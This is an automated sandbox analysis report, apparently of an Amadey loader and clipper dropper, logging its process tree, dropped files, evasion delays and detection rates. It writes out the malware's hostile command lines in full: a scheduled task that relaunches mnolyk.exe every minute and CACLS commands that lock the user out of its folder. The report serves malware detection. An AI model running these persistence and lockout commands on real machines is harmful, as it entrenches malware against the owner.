                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_022FA1A8 ChangeServiceConfigA,2_2_022FA1A8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_010E4FE0
                            Source: file.exeReversingLabs: Detection: 69%
                            Source: file.exeVirustotal: Detection: 52%
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_010E1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A71F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00A71F90
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_010E597D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01
                            Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_010E2BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCommand line argument: Kernel32.dll1_2_00A72BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCommand line argument: 08A2_2_00413780
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: wextract.pdb source: file.exe, bmKg.exe.0.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.312037051.00000000052D0000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000008.00000000.444906113.000000000139E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000009.00000000.446524500.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000009.00000002.834452126.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000002.451321345.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000000.450744153.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000016.00000000.531763918.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000016.00000002.531978816.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001A.00000000.658255066.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001A.00000002.658522671.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000002.787572067.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000000.786896647.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe.0.dr, mnolyk.exe.8.dr
                            Source: Binary string: Healer.pdb source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415653987.0000000002510000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wextract.pdbGCTL source: file.exe, bmKg.exe.0.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004BBA000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.416696337.00000000001F2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                            Source: Binary string: _.pdb source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: QC:\gabebuneyitu besefahuc_wewi.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000000.312858921.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aTaf.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.834537684.000000006F46F000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.9.dr, clip64[1].dll.9.dr
                            Source: Binary string: Healer.pdbH5 source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415653987.0000000002510000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\gabebuneyitu besefahuc_wewi.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000000.312858921.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aTaf.exe.1.dr

                            Data Obfuscation

                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeUnpacked PE file: 2.2.aTaf.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeUnpacked PE file: 2.2.aTaf.exe.400000.0.unpack .text:ER;.data:W;.sozibuy:R;.zeher:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E724D push ecx; ret 0_2_010E7260
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A7724D push ecx; ret 1_2_00A77260
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0051C125 push ebx; ret 2_2_0051C126
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0050E484 push ecx; ret 2_2_0050E497
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0051BE73 push cs; iretd 2_2_0051BF49
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0051BF75 push cs; iretd 2_2_0051BF49
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_022F4139 push edi; iretd 2_2_022F414E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_022F454E push ecx; retf 2_2_022F4554
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_01387D26 push ecx; ret 8_2_01387D39
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0137F748 push E8FFFFFBh; iretd 8_2_0137F74D
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010E2F1D
                            Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                            Source: aTaf.exe.1.drStatic PE information: section name: .sozibuy
                            Source: aTaf.exe.1.drStatic PE information: section name: .zeher

                            Persistence and Installation Behavior

                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.834626616.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 3136, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_010E1AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A71AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00A71AE8

                            Boot Survival

                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe TID: 5960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 5116Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1636Thread sleep count: 116 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1636Thread sleep time: -3480000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 2620Thread sleep time: -50000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6080Thread sleep count: 44 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5880Thread sleep count: 42 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5880Thread sleep time: -7560000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1636Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exe TID: 3492Thread sleep count: 170 > 30
                            Source: C:\Windows\SysWOW64\rundll32.exe TID: 3492Thread sleep time: -170000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-25516
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-25776
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2575
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2456
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 6.7 %
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_0041D8CA sldt word ptr [eax]2_2_0041D8CA
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeAPI call chain: ExitProcess graph end nodegraph_2-25778
                            Source: mnolyk.exe, 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                            Source: mnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_010E5467
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_010E2390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exeCode function: 1_2_00A72390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00A72390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0138FC58 FindFirstFileExW,8_2_0138FC58
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
